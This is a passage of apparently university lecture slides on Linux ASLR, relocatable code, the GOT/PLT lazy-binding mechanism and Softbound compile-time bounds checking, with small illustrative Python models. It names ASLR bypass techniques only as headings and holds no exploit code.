    • 2 : (default setting) setting 1, and in addition the data segment location is randomized
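The current setting can be read from the proc file named above. The sketch below is written to degrade gracefully: on a system without that file (for example, not Linux) `current_setting` returns None. The description strings paraphrase the slide, and the function names are illustrative.

```python
from pathlib import Path

SETTINGS = {
    0: "ASLR disabled",
    1: "stack, VDSO and shared memory regions randomized",
    2: "setting 1 plus randomized data segment (default)",
}
PROC_FILE = Path("/proc/sys/kernel/randomize_va_space")


def describe(value: int) -> str:
    """Human-readable meaning of a randomize_va_space value."""
    return SETTINGS.get(value, "unknown setting")


def current_setting(path: Path = PROC_FILE):
    """Return the kernel's current value, or None when the file is unavailable."""
    try:
        return int(path.read_text().strip())
    except (OSError, ValueError):
        return None


value = current_setting()
print(value, describe(value) if value is not None else "not available on this system")
```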


73 of 106

ASLR in Action

(Figure: addresses observed in a First Run and in Another Run of the same program)

74 of 106

ASLR in the Linux Kernel

  • Permanent changes can be made by editing the /etc/sysctl.conf file, for example:

      kernel.randomize_va_space = value

  • Apply the change with:

      sysctl -p

75 of 106

Internals : Making code relocatable

  • Load time relocatable
    • The loader modifies the program executable so that all addresses are adjusted properly
    • Slow load time since executable code needs to be modified
    • Requires a writeable code segment, which could pose problems
  • PIE : position independent executable
    • Built from PIC (position independent code)
    • Code that executes properly irrespective of its absolute address
    • Used extensively in shared libraries
      • Easy to find a location where to load them without overlapping with other modules

76 of 106

Load Time Relocatable


77 of 106

Load Time Relocatable

Step 2: note the 0x0 in the disassembly; the actual address of mylib_int is not filled in

78 of 106

Load Time Relocatable

Step 3: a relocation table present in the executable lists all references to mylib_int

79 of 106

Load Time Relocatable

Step 4: the loader fills in the actual address of mylib_int at run time, when the program is loaded.

80 of 106

Load Time Relocatable

Limitations

  • Slow load time since executable code needs to be modified
  • Requires a writeable code segment, which could pose problems
  • Since the executable code of each program needs to be customized, it would prevent sharing of code sections

81 of 106

PIC Internals

  • An additional level of indirection for all global data and function references
  • Uses a lot of relative addressing schemes and a global offset table (GOT)
  • For relative addressing,
    • data loads and stores should not be at absolute addresses but must be relative

Details about PIC and GOT taken from:
http://eli.thegreenplace.net/2011/11/03/position-independent-code-pic-in-shared-libraries/

82 of 106

Global Offset Table (GOT)

  • Table at a fixed (known) location relative to the code, known to the linker
  • Holds the absolute addresses of variables and functions

(Figure: a variable reference without GOT and with GOT)

83 of 106

Enforcing Relative Addressing (example)

(Listings compared: with load time relocatable code, and with PIC)

84 of 106

Enforcing Relative Addressing (example)

(Listings compared: with load time relocatable code, and with PIC)

Steps in the PIC listing:

  1. Get the address of the next instruction to achieve relativeness
  2. Index into the GOT and get the actual address of mylib_int into eax
  3. Now work with the actual address.

85 of 106

Advantage of the GOT

  • With load time relocatable code, every variable reference would need to be changed
    • Requires writeable code segments
    • Huge overheads during load time
    • Code pages cannot be shared
  • With a GOT, the table needs to be constructed just once during the execution
    • The GOT is in the data segment, which is writeable
    • Data pages are not shared anyway
    • Drawback : runtime overheads due to multiple loads

86 of 106

An Example of working with GOT

$ gcc -m32 -shared -fpic -S got.c

With -S, the compilation stops after generating got.s, the assembly code for the program

87 of 106

Annotations on got.s (data section and text section):

  • Fills %ecx with the eip of the next instruction. Why do we need this indirect way of doing this? In this case, what will %ecx contain?
  • The macro for the GOT is known by the linker. %ecx will now contain the offset to the GOT
  • Load the absolute address of myglob from the GOT into %eax

88 of 106

More

(Listing annotation: offset of myglob in the GOT)

GOT it!

89 of 106

Deep Within the Kernel (randomizing the data section)

Annotations on the kernel code:

  • Loading the executable
  • Check if randomize_va_space is > 1 (it can be 1 or 2)
  • Compute the end of the data segment (m->brk + 0x20)
  • Finally, randomize

90 of 106

Function Calls in PIC

  • Theoretically, could be done in the same way as for data
    • The call instruction gets the location from a GOT entry that is filled in at load time (this process is called binding)
    • In practice, this is time consuming: there are many more functions than global variables, and most functions in libraries are unused
  • Lazy binding scheme
    • Delay binding until the function is invoked
    • Uses a double indirection: the PLT (procedure linkage table) in addition to the GOT

91 of 106

The PLT

  • Instead of directly calling func, invoke an offset in the PLT (step 1).
  • The PLT is part of the executable text section, and consists of one entry for each external function the shared library calls.
  • Each PLT entry has
    • a jump to a location held in a specific GOT entry
    • preparation of arguments for a 'resolver'
    • a call to the resolver function

92 of 106

First Invocation of Func

(steps 2 and 3) On the first invocation of func, PLT[n] jumps through GOT[n], which initially just points back into PLT[n]

93 of 106

First Invocation of Func

(step 4) Invoke the resolver, which resolves the actual address of func, places this actual address into the GOT, and then invokes func

  • The arguments passed to the resolver help it do the symbol resolution
  • Note that the contents of the GOT are now changed to point to the actual address of func
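Lazy binding can be modelled with a table of call targets that starts out pointing at resolver stubs. This is a conceptual sketch in Python, not the dynamic linker's mechanism: the class `LazyLinker`, the dictionary standing in for the GOT, and the sample symbol `func` are all illustrative.

```python
class LazyLinker:
    """Toy PLT/GOT: GOT[name] starts at a resolver stub and is patched on first call."""

    def __init__(self, library: dict):
        self.library = library          # symbol name -> real function (the shared library)
        self.got = {}                   # symbol name -> current call target
        self.resolver_calls = 0
        for name in library:
            self.got[name] = self._make_stub(name)

    def _make_stub(self, name: str):
        def stub(*args):
            self.resolver_calls += 1
            target = self.library[name]      # symbol resolution
            self.got[name] = target          # patch the GOT entry
            return target(*args)             # then invoke the real function
        return stub

    def call_via_plt(self, name: str, *args):
        return self.got[name](*args)         # PLT entry: indirect jump through the GOT


linker = LazyLinker({"func": lambda x: x + 1})
print(linker.call_via_plt("func", 1), linker.resolver_calls)   # first call: resolver runs
print(linker.call_via_plt("func", 2), linker.resolver_calls)   # later calls: direct
```

The resolver cost is paid once per function that is actually called, which is why unused library functions add nothing to load time.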


94 of 106

Example of PLT

The compiler converts the call to set_mylib_int into set_mylib_int@plt

95 of 106

Example of PLT

  • ebx points to the GOT; ebx + 0x10 is the entry corresponding to set_mylib_int
  • Offset of set_mylib_int in the GOT (+0x10): it contains the address of the next instruction (i.e. 0x3c2)

96 of 106

Example of PLT

  • Push arguments for the resolver.
  • Jump to the first entry of the PLT, i.e. PLT[0]
  • Jump to the resolver, which resolves the actual address of set_mylib_int and fills it into the GOT

97 of 106

Subsequent invocations of Func


98 of 106

Advantages

  • Functions are relocatable, therefore good for ASLR
  • Functions are resolved only when needed, which saves time during the load phase

99 of 106

Bypassing ASLR

  • Brute force
  • Return-to-PLT
  • Overwriting the GOT
  • Timing Attacks


100 of 106

Safer Programming Languages, and Compiler Techniques

101 of 106

Other Precautions for buffer overflows

  • Enforce memory safety in the programming language
    • Examples: Java, C# (slow and not feasible for system programming)
      • Cannot replace C and C++ (too much software already developed in C / C++)
    • Newer languages like Rust seem promising

  • Use more secure libraries. For example C11 Annex K: gets_s, strcpy_s, strncpy_s, etc. (_s is for secure)

102 of 106

Compile Bounds Checking

  • Check accesses to each buffer so that they cannot go beyond its bounds
  • In C and C++, bounds checking is performed at pointer calculation time or at dereference time.
  • Requires run-time bound information for each allocated block.
  • Two methodologies
    • Object based techniques
    • Pointer based techniques

Softbound : Highly Compatible and Complete Spatial Memory Safety for C
Santosh Nagarakatte, Jianzhou Zhao, Milo M. K. Martin, and Steve Zdancewic

103 of 106

Softbound

  • Every pointer in the program is associated with a base and a bound
  • Before every pointer dereference, a check verifies whether the dereference is legally permitted

These checks are automatically inserted at compile time for all pointer variables. For non-pointers, this check is not required.

104 of 106

Softbound – more details

  • Pointer arithmetic and assignment
    • The new pointer inherits the base and bound of the original pointer
    • No specific checks are required until dereferencing is done
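The base and bound bookkeeping can be illustrated with a pointer object that carries its metadata. This is a Python model of the idea, not Softbound's implementation (which instruments C at compile time); `CheckedPtr` and `deref` are hypothetical names, and `bound` is taken to be one past the last valid address.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class CheckedPtr:
    addr: int      # current pointer value
    base: int      # first valid address of the underlying object
    bound: int     # one past the last valid address

    def __add__(self, offset: int) -> "CheckedPtr":
        # Pointer arithmetic: the metadata is inherited, no check yet.
        return CheckedPtr(self.addr + offset, self.base, self.bound)


def deref(memory: bytearray, ptr: CheckedPtr, size: int = 1) -> bytes:
    """The check that is inserted before every dereference."""
    if ptr.addr < ptr.base or ptr.addr + size > ptr.bound:
        raise MemoryError(f"out-of-bounds access at {ptr.addr}")
    return bytes(memory[ptr.addr:ptr.addr + size])


memory = bytearray(b"0123456789ABCDEF")
buf = CheckedPtr(addr=0, base=0, bound=10)      # a 10-byte object at address 0
print(deref(memory, buf + 9))                   # last valid element
try:
    deref(memory, buf + 10)                     # one past the end
except MemoryError as err:
    print("blocked:", err)
```

Computing `buf + 10` is allowed; only the dereference is rejected, which matches the rule that checks happen at dereference time.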


105 of 106

Storing Metadata

  • Table maintained for metadata


106 of 106

Softbound – more details

  • Pointers passed to functions
    • If pointers are passed on the stack, there are no issues: the compiler can put the related metadata onto the stack
    • If pointers are passed in registers, the compiler modifies every function declaration to add more arguments for the metadata
      • For each function parameter that is a pointer, the corresponding base and bound values are also sent to the function